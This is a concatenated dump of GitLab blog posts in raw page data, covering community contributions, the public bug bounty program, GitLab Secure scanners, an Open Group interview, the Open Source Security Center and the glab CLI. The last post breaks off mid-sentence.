class=\"twitter-tweet\">\u003Cp lang=\"en\" dir=\"ltr\">Achievement unlocked: having NASA contribute directly to your codebase. Open core ftw. \u003Ca href=\"https://t.co/qcnu8jhQuR\">https://t.co/qcnu8jhQuR\u003C/a>\u003C/p>&mdash; Brendan O’Leary (@olearycrew) \u003Ca href=\"https://twitter.com/olearycrew/status/1363992971188740103?ref_src=twsrc%5Etfw\">February 22, 2021\u003C/a>\u003C/blockquote> \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\nRoger Meier, principal key expert and service owner of code.siemens.com from [Siemens IT](/customers/siemens/) explains, “If we want to have new features, we contribute them to GitLab.” \n\n## A DevOps platform gives you visibility into security and beyond\n\nWorking in the open presents unique security challenges (you can read about how we [prevent security fixes from leaking into our public repositories](/blog/how-we-prevented-security-fixes-leaking-into-our-public-repositories/)), but we’re proud of how taking an open approach to security serves our community, customers, and us.  \n\nCommunity member [Ethan Reesor](https://gitlab.com/firelizzard) is working on improving and simplifying how we do [authorization in our package managers](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/38627) and added some great test coverage around that in [gitlab-org/gitlab!50729](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/50729).\n\nSecurity issues are often reported to us directly in GitLab, but Dominic Couture, senior security engineer, [Application Security](/topics/devsecops/) at GitLab, explains that even security bugs reported through our [HackerOne bug bounty program](https://hackerone.com/gitlab) are often made public 30 days after they’re fixed: everyone can see the [old security issues](https://gitlab.com/gitlab-org/gitlab/-/issues?scope=all&utf8=%E2%9C%93&state=all&label_name[]=HackerOne). “This creates a positive feedback loop where external security researchers can look into old issues to help them find and disclose new ones to us.” You can read more reflections on [security and open source here](/blog/open-source-security/).\n\n### Debugging together\n\nOur customers regularly collaborate with us to debug problems. In this example, a customer helped our backend engineers to [resolve an S1 bug](https://gitlab.com/gitlab-org/gitlab/-/issues/261667), and even gave us access to part of their system to test the fix – showing that we’re most successful when everyone’s committed to iteration.\n\nSmall fixes and improvements to our documentation often arise out of customer interactions with our support engineers – you can see all the [merge requests from 2021 captured here](https://gitlab.com/gitlab-com/support/support-team-meta/-/issues?label_name%5B%5D=Support+Team+Contributions).\n\nFor some customers, contributing to GitLab is even an official part of their job. Learn about how [one of our contributors at CERN here](/blog/cern-contributor-post/) helps make GitLab’s [open DevOps platform](/solutions/devops-platform/) better.\n\n### Getting to the root of performance problems\n\n[Working in public by default](https://handbook.gitlab.com/handbook/values/#public-by-default) is a little uncomfortable at first – especially when it comes to troubleshooting performance issues – but the advantage of this visibility is that we can crowdsource solutions. \n\nIn July 2019, our site reliability engineers noticed a significant increase in errors and site slowdown on GitLab.com. In the course of investigation, community member [Andrew Armstrong](https://gitlab.com/phplasma) [commented on the public issue ](https://gitlab.com/gitlab-com/gl-infra/production/-/issues/928#note_187236004) with a suggestion: The Redis instance might be approaching its self-imposed memory limit, which can overwhelm the instance quickly even if plenty of physical memory is available. This inspired a review of the time to live (TTL) we apply to Redis keys.\n\n## Living our values through DevOps \n\nWe're proud to partner with groups who foster [our values](https://handbook.gitlab.com/handbook/values/) in their communities. [The Last Mile](/blog/thelastmile-gitlab/) is opening doors for aspiring software engineers at correctional facilities across the US. [GNOME moved to GitLab in 2018](/blog/welcome-gnome-to-gitlab/), and together with [Endless](https://endlessnetwork.com/) they [launched the Coding Education Challenge](/blog/gnome-follow-up/#whats-new-at-gnome-and-what-are-some-of-the-new-things-on-the-horizon) to inspire a new generation to \"take control of their digital worlds, not be controlled by them.\" Read more about intitiatives from our [friends in open source](/blog/categories/open-source/). \n\n_These are just a few examples of the improvements you make to GitLab and the wider community, and we want to keep celebrating how you iterate and innovate using our open DevOps platform. Got a story of your own to share? **We’re accepting proposals for our virtual user conference, [GitLab Commit](/events/commit/)** (Aug. 3-4, 2021) and would love to hear from you._\n",[9,267,3327],"DevOps platform",{"slug":3329,"featured":6,"template":689},"how-you-contribute-to-gitlabs-open-devops-platform","content:en-us:blog:how-you-contribute-to-gitlabs-open-devops-platform.yml","How You Contribute To Gitlabs Open Devops Platform","en-us/blog/how-you-contribute-to-gitlabs-open-devops-platform.yml","en-us/blog/how-you-contribute-to-gitlabs-open-devops-platform",{"_path":3335,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3336,"content":3342,"config":3348,"_id":3350,"_type":14,"title":3351,"_source":16,"_file":3352,"_stem":3353,"_extension":19},"/en-us/blog/inside-the-gitlab-public-bug-bounty-program",{"title":3337,"description":3338,"ogTitle":3337,"ogDescription":3338,"noIndex":6,"ogImage":3339,"ogUrl":3340,"ogSiteName":673,"ogType":674,"canonicalUrls":3340,"schema":3341},"Inside the GitLab public bug bounty program","Four months since going public with our bug bounty program, we dive into where we’re at, what success looks like, and what to expect down the road.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679034/Blog/Hero%20Images/inside-gitLab-public-bug-bounty-program.png","https://about.gitlab.com/blog/inside-the-gitlab-public-bug-bounty-program","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Inside the GitLab public bug bounty program\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Kathy Wang\"}],\n        \"datePublished\": \"2019-04-29\",\n      }",{"title":3337,"description":3338,"authors":3343,"heroImage":3339,"date":3345,"body":3346,"category":865,"tags":3347},[3344],"Kathy Wang","2019-04-29","\nAt GitLab, our Security Team has two top-level missions that all of our goals must map to:\n\n1. Secure the product and service.\n2. Protect the company.\n\nWe understand that source code is often the crown jewel of any organization. This is true of the [open core](/blog/gitlab-is-open-core-github-is-closed-source/) code that powers GitLab itself, so we are constantly applying our value of [results](https://handbook.gitlab.com/handbook/values/#results) and [iteration](https://handbook.gitlab.com/handbook/values/#iteration) to the benefit of all GitLab users.\n\nThere are a few basic truths about security:\n\n- Security is about people, process, and technology. Understanding how to optimally balance those pillars is crucial to an effective strategy and strong security posture.\n- Security cannot block business process and the ability to get work done.\n- Security is never 100 percent, and a multi-layer approach must be taken to reduce risk.\n\n## Proactive and reactive security measures\n\nIt makes sense to think about security in terms of proactive and reactive measures, as both are required to truly implement defense-in-depth security. When it comes to [application security](/topics/devsecops/), proactive measures include conducting internal application security reviews and educating developers on secure coding best practices. However, the ratio of developers to application security engineers is high, so the feasibility for organizations to review every single line of code manually is decreasing. Code scanning measures introduce automation in reviewing, but could also miss findings.\n\nEnter reactive measures, such as internal red teams and public bug bounty programs. These come in after the fact – after the source code is written and committed – and provide another, necessary layer of security to our environment.\n\nSince launching GitLab’s [public bug bounty program](/blog/gitlab-hackerone-bug-bounty-program-is-public-today/) in December 2018, we’ve resolved 95 security findings, awarded more than $300,000 in bounties and rewarded over 35 hackers for those findings. The overarching goal of our bug bounty program is to make our products and services more secure, and we’re proud of the early success we’ve seen to date.\n\n## How are we measuring success?\n\nWe’re looking at several key metrics and focus areas to determine what’s working and what needs to improve. In fact, our next blog post will dive into some of our early lessons learned, and the process and program improvements we’ve made to ensure we’re meeting our goal.\n\n### Quantity of new report submissions\n\nWe look at the total number of reports received and the average of new reports created each month to help us ensure we’re moving in the right direction in terms of incentivization and engagement amongst our HackerOne reporters. In just the first three months after making our bug bounty program public, we received 266 new reports. That’s an average of 88.6 reports per month. Of those reported, 76 were triaged as valid and 89 were resolved. We classify triaged reports as those for which we’ve assessed a potential user impact, and resolved reports are those we’ve investigated and resolved.\n\n### Repeat reporters\n\nWhen we have reporters who continue to submit findings to our program, that’s another signal that we are on the right track in terms of incentivizing and supporting their efforts so that they keep coming back. Out of a total of 247 reporters from the past year, 38 percent have submitted more than one, 13 percent more than five, and 6 percent more than 10 reports.\n\n#### Check out the top five GitLab reporters (by bounty):\n\n1. [ngalog](https://hackerone.com/ngalog)\n1. [ jobert](https://hackerone.com/jobert)\n1. nyangawa\n1. [fransrosen](https://hackerone.com/fransrosen)\n1. [xanbanx](https://hackerone.com/xanbanx)\n\n### Transparency\n\nThe majority of reporters want to make their vulnerability reports public to showcase their findings and techniques and, also, just for some good ol’ fashioned bragging rights within the hacker community. There’s also a real need in this community to be constantly challenged and a dedication to learning that public disclosure helps to satisfy. Many other bug bounty programs don’t publicly release the full details of their vulnerability reports and subsequently discourage the HackerOne community from sharing or showing off their findings. However, as one of GitLab's values is [transparency](https://handbook.gitlab.com/handbook/values/#transparency), we set all vulnerability details to public in our [issue tracker](https://gitlab.com/groups/gitlab-org/-/issues?scope=all&utf8=%E2%9C%93&state=closed&label_name[]=security&label_name[]=HackerOne) 30 days after a patch has been [released](/releases/categories/releases/).\n\n### Responsiveness\n\nThe HackerOne community expects responsiveness in the communication of updates and payment of bounties. To help ensure we respond and triage as quickly as possible, we’ve built in automation so that we can provide timely initial and ongoing feedback to reporters, as well as continuous updates on the ETA of fixes for existing reports. We’re working in the area of bounties payment to improve our process and reward bounties immediately after triage, where applicable, rather than when fixed. Expect to hear more on this in forthcoming bug bounty blog posts!\n\n### Competitive rewards\n\nOur desire is to be the number one paying bounty company in our industry. This aim is to keep reporters incentivized, motivated, and engaged to find bugs on our platform. Our public bug bounty program is as important to the security of our product and company as any other program we run within our Security Team here at GitLab. That's why we’re continually looking to improve our processes and incentive structure to benefit our reporter community.\n\n{::options parse_block_html=\"true\" /}\n\n\u003Ci class=\"fab fa-gitlab\" style=\"color:rgb(107,79,187); font-size:.85em\" aria-hidden=\"true\">\u003C/i>&nbsp;&nbsp;\nWe know a big, fat check speaks volumes, but we also know some cool swag is a nice little pat on the back too. So, we’re putting it out there – if you could put a GitLab Tanuki on any piece of swag – what would it be?  Leave us a comment below!\n&nbsp;&nbsp;\u003Ci class=\"fab fa-gitlab\" style=\"color:rgb(107,79,187); font-size:.85em\" aria-hidden=\"true\">\u003C/i>\n{: .alert .alert-webcast}\n",[267,865,9,995],{"slug":3349,"featured":6,"template":689},"inside-the-gitlab-public-bug-bounty-program","content:en-us:blog:inside-the-gitlab-public-bug-bounty-program.yml","Inside The Gitlab Public Bug Bounty Program","en-us/blog/inside-the-gitlab-public-bug-bounty-program.yml","en-us/blog/inside-the-gitlab-public-bug-bounty-program",{"_path":3355,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3356,"content":3362,"config":3368,"_id":3370,"_type":14,"title":3371,"_source":16,"_file":3372,"_stem":3373,"_extension":19},"/en-us/blog/integrating-with-gitlab-secure",{"title":3357,"description":3358,"ogTitle":3357,"ogDescription":3358,"noIndex":6,"ogImage":3359,"ogUrl":3360,"ogSiteName":673,"ogType":674,"canonicalUrls":3360,"schema":3361},"How open source contributions accelerate GitLab Secure","Community contributions and an open integration framework allows anyone to extend GitLab Secure","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749668622/Blog/Hero%20Images/group-rowing-collaboration.jpg","https://about.gitlab.com/blog/integrating-with-gitlab-secure","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How open source contributions accelerate GitLab Secure\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Taylor McCaslin\"}],\n        \"datePublished\": \"2020-10-22\",\n      }",{"title":3357,"description":3358,"authors":3363,"heroImage":3359,"date":3365,"body":3366,"category":10,"tags":3367},[3364],"Taylor McCaslin","2020-10-22","\nWhen you think about security you probably imagine locks, gates, and closed systems. This is the more traditional approach to security but modern security is much more open and collaborative. If you want to build the most secure systems, there is nothing better than building those systems in the open. Open security practices allow you to get fast feedback from a broad audience with diverse perspectives, helping you build better more holistic solutions. That's our approach to building [GitLab Secure](/stages-devops-lifecycle/secure/) at GitLab. We're leveraging amazing open source security projects, the collective contribution of the wider community, and providing an open integration system for anyone to build on top of GitLab security scanners.\n\n## Shifting left\n\nTraditional security approaches are opaque and late in the development life cycle. Security scans are performed by isolated security experts long after developers write code, often after it's deployed to production. GitLab aims to make security an integrated and continuous process. That's why we've built [GitLab Secure directly integrated into the DevOps life cycle](/solutions/security-compliance/). We are taking security tools and \"shifting left\" to make these tools more accessible to developers earlier in the development life cycle and integrated directly into developers' workflows.\n\n![Traditional Security vs DevSecOps with GitLab](https://about.gitlab.com/images/blogimages/traditional-security-vs-integrated.png)\n\nWe created a detailed survey to learn more about the [2020 DevSecOps Landscape](/developer-survey/#security). The results of the survey indicated that security is still a significant hurdle for most organizations that use DevOps, and show:\n\n- Only 13% of companies give developers access to the results of [application security](/topics/devsecops/) tests\n- Over 42% said testing happens too late in the lifecycle\n- 36% reported it was hard to understand, process, and fix any discovered vulnerabilities\n- 31% found prioritizing vulnerability remediation an uphill battle\n\nThese statistics illustrate why we are building security scanning directly into GitLab with our Secure features. We want to provide integrated security tools to broaden access and make it easier for everyone using GitLab to write more secure code.\n\n## Integrating security tools into everyday workflows\n\nGitLab Secure enables accurate, automated, and continuous assessment of your applications and services, allowing users to proactively identify vulnerabilities and weaknesses to minimize security risk. Secure is not an additional step in your development process nor an additional tool to introduce to your software stack. It is woven into your DevOps cycle, which allows you to adapt security testing and processes to your developers (and not the other way around).\n\nToday [GitLab Secure](/stages-devops-lifecycle/secure/) offers support for a variety of security scanning tools including:\n- [Static Application Security Testing (SAST)](https://docs.gitlab.com/ee/user/application_security/sast/)\n- [Dynamic Application Security Testing (DAST)](https://docs.gitlab.com/ee/user/application_security/dast/)\n- [Container Scanning](https://docs.gitlab.com/ee/user/application_security/container_scanning/)\n- [Dependency Scanning](https://docs.gitlab.com/ee/user/application_security/dependency_scanning/)\n- [License Scanning](https://docs.gitlab.com/ee/user/compliance/license_compliance/index.html)\n- [Secret Detection](https://docs.gitlab.com/ee/user/application_security/secret_detection/)\n- [API Fuzzing](https://docs.gitlab.com/ee/user/application_security/api_fuzzing/)\n- [Coverage Fuzzing](https://docs.gitlab.com/ee/user/application_security/coverage_fuzzing/)\n\nAll of these tools provide unique approaches to finding security problems. No one tool is best at everything, so we wanted to provide a way to leverage many tools in an integrated way, so you're always getting the most relevant security results. Take a look at how GitLab Secure integrates all these tools into common developer workflows on GitLab:\n\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/XnYstHObqlA\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\n## Democratizing security\n\nWith GitLab Secure, we've laid the foundation for bringing security tools directly into developers' workflows. At GitLab, we believe in a world where [everyone can contribute](/company/culture/#everyone-can-contribute). [Collaboration](https://handbook.gitlab.com/handbook/values/#collaboration) and [transparency](https://handbook.gitlab.com/handbook/values/#transparency) are part of our core values. This approach changes the way we build security features. That's why as part of our [community stewardship promise](/company/stewardship/#promises) we've made all our open source based [SAST scanners available for all users](/releases/2020/08/22/gitlab-13-3-released/#sast-security-analyzers-available-for-all), we offer [open source projects and nonprofits free access to our best features](/solutions/open-source/join/), and we've created a [security scanner integration framework](https://docs.gitlab.com/ee/development/integrations/secure.html) to allow anyone to contribute security scan tools. Our entire [product strategy and vision](/direction/secure/) is also open source, so everyone can understand our vision for an integrated, accessible, and democratic approach to security. Together we can build a more open and modern security approach that helps developers everywhere write more secure code.\n\n## Integrate with GitLab Secure\n\nOut of the box, GitLab provides a variety of pre-integrated and actively managed open source security tools, such as [SAST's 16 analyzers](https://docs.gitlab.com/ee/user/application_security/sast/#supported-languages-and-frameworks) that all support automatic language detection to always run the most relevant security tool. While GitLab will continue to update and build first-party integrations we wanted to ensure that GitLab contributors and integration partners could easily extend GitLab Secure for third-party tools. Our [open integration framework](https://docs.gitlab.com/ee/development/integrations/secure.html) makes it easy for anyone to leverage all of the [features of GitLab Secure](/pricing/feature-comparison/) with any scanning tool they may want to integrate. You can see all the tools GitLab users have requested support for and even add your own request in our [tracking epic](https://gitlab.com/groups/gitlab-org/-/epics/297).\n\n## Community contributions\n\nWith our open integration framework we've seen members of the [GitLab community](/community/) contribute additional security scanners, help maintain the existing open source scanners we offer and expand the list of supported languages and frameworks we support. Our community contributors are helping every GitLab user have access to more accurate, sophisticated, and relevant security results. Here are some recent community contribution highlights:\n\n- [Mobile SAST support via MobSF](https://gitlab.com/gitlab-org/gitlab/-/issues/233777) (contribution by [@williams.brian-heb](https://gitlab.com/williams.brian-heb)) - [GitLab 13.5 Release MVP](/releases/2020/10/22/gitlab-13-5-released/#mvp)\n- [Adding Helm Chart support](https://gitlab.com/gitlab-org/gitlab/-/issues/36755) (contribution by [@agixid](https://gitlab.com/agixid))\n- [Performance improvements to Fuzz testing](https://gitlab.com/gitlab-org/security-products/analyzers/fuzzers/pythonfuzz/-/merge_requests/1) (contribution by [@jvoisin](https://gitlab.com/jvoisin))\n- [Updates to secret detection](https://gitlab.com/gitlab-org/gitlab/-/issues/205172) (contribution by [@tnir](https://gitlab.com/tnir))\n- [Dependency scanning buxfixes](https://gitlab.com/gitlab-org/gitlab/-/issues/205172) (contribution by [@fcbrooks](https://gitlab.com/fcbrooks))\n- [Updates to Security Scanner underlying operating systems](https://gitlab.com/gitlab-org/gitlab/-/issues/216781) (contribution by [@J0WI](https://gitlab.com/J0WI))\n- [Contributions for .NET Framework Support](https://gitlab.com/gitlab-org/security-products/analyzers/security-code-scan/-/merge_requests/14) (contribution by [@agixid](https://gitlab.com/agixid))\n- [See the full list of Secure community contributions](https://gitlab.com/gitlab-org/gitlab/-/issues?scope=all&utf8=%E2%9C%93&state=all&label_name[]=Community%20contribution&label_name[]=devops%3A%3Asecure)\n\nThe open source nature of GitLab allows the community to help improve, maintain, and contribute features within GitLab. This is the ultimate value of open source. Even if we don't offer something, you can always extend or modify the behavior of GitLab to accomplish your goal. When compared to closed-source Security vendors, this is a huge benefit. The impact these contributions have is massive as GitLab Secure is used by tens of thousands of customers and performs hundreds of thousands of security scans every month. If you are interested in contributing, check out our [contributor program](/community/contribute/) and [contributor documentation](https://docs.gitlab.com/ee/development/contributing/).\n\n## Integration partners\n\nCommunity contributions aren't the only way GitLab Secure is being extended. We have a variety of integration partners who provide security integrations that further expand the suite of security tools available to GitLab users. Check out the [GitLab Security integrations](/partners/#security) our partners offer. If you are a security vendor interested in integrating with GitLab, [join our partner program](/handbook/alliances/integration-instructions/) today.\n\n## Looking ahead\n\nWe've come a long way in the past few years with GitLab Secure and we're not done yet. Our [vision is bold (and open source)](/direction/secure/) and [our investment in security is large](https://internal.gitlab.com/handbook/product/investment/). [Security is a team effort](/direction/secure/#security-is-a-team-effort) and we hope you'll join us on our mission to help developers write more secure code.\n\n## Read more about GitLab SAST:\n\n* GitLab [Secure Direction](/direction/secure/)\n* Learn more about [integrating with GitLab Secure](https://docs.gitlab.com/ee/development/integrations/secure.html)\n* View the latest [October 2020 GitLab security trends](/blog/gitlab-latest-security-trends/)\n\nCover image by [Mitchell Luo](https://unsplash.com/@mitchel3uo) on [Unsplash](https://unsplash.com/s/photos/rowing-team)\n{: .note}\n",[109,685,865,267,708,9],{"slug":3369,"featured":6,"template":689},"integrating-with-gitlab-secure","content:en-us:blog:integrating-with-gitlab-secure.yml","Integrating With Gitlab Secure","en-us/blog/integrating-with-gitlab-secure.yml","en-us/blog/integrating-with-gitlab-secure",{"_path":3375,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3376,"content":3382,"config":3386,"_id":3388,"_type":14,"title":3389,"_source":16,"_file":3390,"_stem":3391,"_extension":19},"/en-us/blog/interview-the-open-group",{"title":3377,"description":3378,"ogTitle":3377,"ogDescription":3378,"noIndex":6,"ogImage":3379,"ogUrl":3380,"ogSiteName":673,"ogType":674,"canonicalUrls":3380,"schema":3381},"Get to know our newest open source partner, The Open Group","The Open Group leaders explain how the organization uses GitLab to build and maintain open standards for transformative digital technologies.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679170/Blog/Hero%20Images/migration-data.jpg","https://about.gitlab.com/blog/interview-the-open-group","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Get to know our newest open source partner, The Open Group\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Bryan Behrenshausen\"}],\n        \"datePublished\": \"2023-06-20\",\n      }",{"title":3377,"description":3378,"authors":3383,"heroImage":3379,"date":1513,"body":3384,"category":10,"tags":3385},[2909],"\n\nFor more than 30 years, [The Open Group](https://www.opengroup.org/) has served as a steward and champion of [open source](https://go.gitlab.com/spHNym) technologies, helping companies achieve business objectives through [open technological standards](http://www.opengroup.org/standardsprocess/main.html). Today, many of the group's approximately 900 member organizations participate in the work of ensuring critical digital technologies remain open and accessible.\n\nThe Open Group recently joined the [GitLab Open Source Partners](https://go.gitlab.com/030Ue3) community, where it can connect with other large-scale, open source consortia and projects using GitLab to advance the state of the open source art. So I brewed a cup of tea and sat down with two of the group's team members — Vice President and CTO [Andras Szakal](https://pages.opengroup.org/aszakal) and GitLab administrator [David Diederich](https://pages.opengroup.org/divido) — to hear how using GitLab helps them achieve their group's mission. \n\nIn this interview, you'll learn how:\n\n* [GitLab CI/CD](https://about.gitlab.com/features/continuous-integration) helps the group build scalable open source projects\n* adopting GitLab's integrated analysis tools helped the organization deploy complex solutions without the [DevOps tax](https://about.gitlab.com/blog/too-many-toolchains-a-devops-platform-migration-is-the-answer/#eliminating-the-devops-tax)\n* GitLab serves as the foundation of the organization's approach to digital transformation\n\n## Watch the interview\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/0--qGhH-MBQ\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n## Learn more\nThe [GitLab Open Source Partners](https://go.gitlab.com/030Ue3) are building the future of open source on GitLab. Connect with them on [Gitlab.com](https://gitlab.com/gitlab-com/marketing/community-relations/open-source-program/gitlab-open-source-partners).\n",[9,267,1099],{"slug":3387,"featured":6,"template":689},"interview-the-open-group","content:en-us:blog:interview-the-open-group.yml","Interview The Open Group","en-us/blog/interview-the-open-group.yml","en-us/blog/interview-the-open-group",{"_path":3393,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3394,"content":3400,"config":3407,"_id":3409,"_type":14,"title":3410,"_source":16,"_file":3411,"_stem":3412,"_extension":19},"/en-us/blog/introducing-gitlabs-open-source-security-center",{"title":3395,"description":3396,"ogTitle":3395,"ogDescription":3396,"noIndex":6,"ogImage":3397,"ogUrl":3398,"ogSiteName":673,"ogType":674,"canonicalUrls":3398,"schema":3399},"Introducing GitLab’s Open Source Security Center","Our open source repository of projects designed to enhance security operations and risk management will help developers adapt faster, respond smarter, and defend better — together.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749661895/Blog/Hero%20Images/blog-image-template-1800x945__7_.png","https://about.gitlab.com/blog/introducing-gitlabs-open-source-security-center","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Introducing GitLab’s Open Source Security Center\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Salman Ladha\"},{\"@type\":\"Person\",\"name\":\"Joseph Longo\"}],\n        \"datePublished\": \"2025-03-04\",\n      }",{"title":3395,"description":3396,"authors":3401,"heroImage":3397,"date":3404,"body":3405,"category":865,"tags":3406},[3402,3403],"Salman Ladha","Joseph Longo","2025-03-04","Today, we’re excited to announce the launch of [GitLab’s Open Source Security Center](https://about.gitlab.com/security/open-source-resources/) — a central repository of security-focused projects developed by GitLab’s internal security team. These tools are designed to help developers, security practitioners, and organizations build safer, more secure software, and more resilient security programs.\n\nSecuring systems is an ongoing challenge for businesses as threat actors continually adapt to new technologies and find creative ways to exploit organizations. Not only are they evolving their tactics, techniques and procedures, but they’re also [collaborating through criminal networks](https://insights.blackhatmea.com/do-cybercriminals-collaborate-and-build-community/), sharing strategies, stolen data, and malicious tools to launch coordinated attacks at scale. \n\nAs these threats grow in complexity, community-driven collaboration is one of our most powerful defenses. It’s a notion we’ve long understood in security — that *defending against adversaries is a shared responsibility*. By working together as a community, we can accelerate our collective intelligence and stay ahead of adversaries.\n\nIn open-sourcing our security solutions, we aim to empower teams to adapt faster, respond smarter, and defend better — together.\n\n[![Open Source Security Center page image](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749674572/Blog/Content%20Images/Screenshot_2025-03-04_at_08.10.05.png)](https://about.gitlab.com/security/open-source-resources/)\n\n## Why open source security? \n\nAt GitLab, open source isn’t just part of our technology — it’s part of our [founding story](https://about.gitlab.com/company/).\n\nSince day one, we’ve championed the open source philosophy, believing that transparency, collaboration, and community-driven development are keys to building better software. Over the years, GitLab has fostered an open source community with more than [4,000 contributors](https://about.gitlab.com/community/contribute/) and has provided a comprehensive DevSecOps platform through its open source [Community Edition](https://about.gitlab.com/install/ce-or-ee/).\n\nWe’ve also been inspired by industry leaders like [Crowdstrike](https://opensource.crowdstrike.com/) and [Palo Alto Networks](https://www.paloaltonetworks.ca/prisma/cloud/open-source-projects), who have shown that open-sourcing security tools not only improves innovation but also strengthens the entire security ecosystem. Following in their footsteps, GitLab is committed to supporting the community by sharing tools, templates, and frameworks developed by our security teams.\n\n## Explore our featured open source security projects\n\nWe’re launching the Open Source Security Center with a range of projects designed to enhance security operations and risk management. Here are some of the featured projects:\n\n* **[StORM templates](https://gitlab.com/gitlab-security-oss/risk-mgmt/storm-templates/):** Streamline your security risk program with templates that standardize risk tracking and reporting.\n\n* **[GUARD Framework](https://about.gitlab.com/blog/unveiling-the-guard-framework-to-automate-security-detections-at-gitlab/):** Automate response and detection with a detections-as-code approach that simplifies detection creation, maintenance, and alert routing.  \n\n* **[GitLab CIS Benchmark Scanner](https://about.gitlab.com/blog/new-cis-gitlab-benchmark-scanner-boosts-security-and-compliance/):** Improve your project’s security posture by auditing against the Center for Internet Security GitLab Benchmark.\n\nWhether you’re a security engineer, researcher, or developer, your expertise and contributions are invaluable. Join us in strengthening the security ecosystem and collaborating with a community dedicated to making software safer for everyone.\n\n> [Explore GitLab’s Open Source Security Center](https://about.gitlab.com/security/open-source-resources/) and contribute to the next chapter of open source security. \n\n## Learn more\n\n- [New CIS GitLab Benchmark scanner boosts security and compliance](https://about.gitlab.com/blog/new-cis-gitlab-benchmark-scanner-boosts-security-and-compliance/)\n- [GitLab introduces new CIS Benchmark for improved security](https://about.gitlab.com/blog/gitlab-introduces-new-cis-benchmark-for-improved-security/)\n- [Unveiling the GUARD framework to automate security detections at GitLab](https://about.gitlab.com/blog/unveiling-the-guard-framework-to-automate-security-detections-at-gitlab/)\n- [Automating cybersecurity threat detections with GitLab CI/CD](https://about.gitlab.com/blog/automating-cybersecurity-threat-detections-with-gitlab-ci-cd/)",[865,930,9,867,1099],{"slug":3408,"featured":91,"template":689},"introducing-gitlabs-open-source-security-center","content:en-us:blog:introducing-gitlabs-open-source-security-center.yml","Introducing Gitlabs Open Source Security Center","en-us/blog/introducing-gitlabs-open-source-security-center.yml","en-us/blog/introducing-gitlabs-open-source-security-center",{"_path":3414,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3415,"content":3421,"config":3427,"_id":3429,"_type":14,"title":3430,"_source":16,"_file":3431,"_stem":3432,"_extension":19},"/en-us/blog/introducing-the-gitlab-cli",{"title":3416,"description":3417,"ogTitle":3416,"ogDescription":3417,"noIndex":6,"ogImage":3418,"ogUrl":3419,"ogSiteName":673,"ogType":674,"canonicalUrls":3419,"schema":3420},"Put `glab` at your fingertips with the GitLab CLI","We just adopted the `glab` project. Here's what's next and how to contribute!","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749682539/Blog/Hero%20Images/newcli.png","https://about.gitlab.com/blog/introducing-the-gitlab-cli","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Put `glab` at your fingertips with the GitLab CLI\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Kai Armstrong\"}],\n        \"datePublished\": \"2022-12-07\",\n      }",{"title":3416,"description":3417,"authors":3422,"heroImage":3418,"date":3424,"body":3425,"category":299,"tags":3426},[3423],"Kai Armstrong","2022-12-07","\n\nWe want to integrate GitLab with the tools our developers already use and love. This mission drove us to [adopt GitLab Workflow for VS Code](/blog/use-gitlab-with-vscode/) two years ago and we’ve been iterating on it ever since (spoiler alert: it is an integral part of our [future Web IDE](/blog/the-future-of-the-gitlab-web-ide/)). As we thought about potential next projects, we considered that the common denominator for developers, regardless of their choice of editor, is their terminal.\n\nThis led us to our next charter: to bring GitLab to the CLI to continue streamlining workflows for developers between their most used technologies.\n\nSimilar to our work with VS Code, we wanted to integrate the GitLab DevSecOps platform into all stages of the code writing process. At GitLab, we’re [dedicated to open source](/handbook/engineering/open-source/#we-believe-in-open-source) and we value building in public. It's this commitment to open source and collaboration that helped us take the first step in this project: looking to our community to see if we could partner with them on an existing open source project to bring the CLI to developers faster.\n\n## Improving GitLab’s native CLI experience\n\nI’m happy to share that we’ve adopted the open source project [`glab`](https://gitlab.com/gitlab-org/cli), which will form the foundation of GitLab’s native CLI experience. The GitLab CLI brings GitLab to your terminal, next to [where you’re already working](https://about.gitlab.com/direction/create/editor_extension/#where-we-are-headed) with Git and your code, without switching between applications and browser tabs.\n\n![glab issue list](https://about.gitlab.com/images/blogimages/glabgettingstarted.gif)\n\n### Efficiency at your fingertips\n\nThis integration means developers can now achieve the following tasks without ever leaving the terminal:\n\n- Review issues assigned to you.\n- Create branches and merge requests for those issues.\n- Check the status of pipelines.\n- Approve and merge work.\n\nToo excited? Need a tl;dr RIGHT NOW? We have [GitLab CLI installation](https://gitlab.com/gitlab-org/cli#installation) instructions waiting for you! When setting up [authentication](https://gitlab.com/gitlab-org/cli#authentication), we’ve partnered with 1Password to support their new [Shell Plugins](https://blog.1password.com/shell-plugins/) making it even easier to authenticate your session and keep your credentials secure.\n\n## How did we get here?\n\nMore than two years ago, [Clement Sam](https://gitlab.com/profclems) (a [GitLab Hero](/community/heroes/)) began work on `glab` because he wanted a tool that made his workflow easier and saved 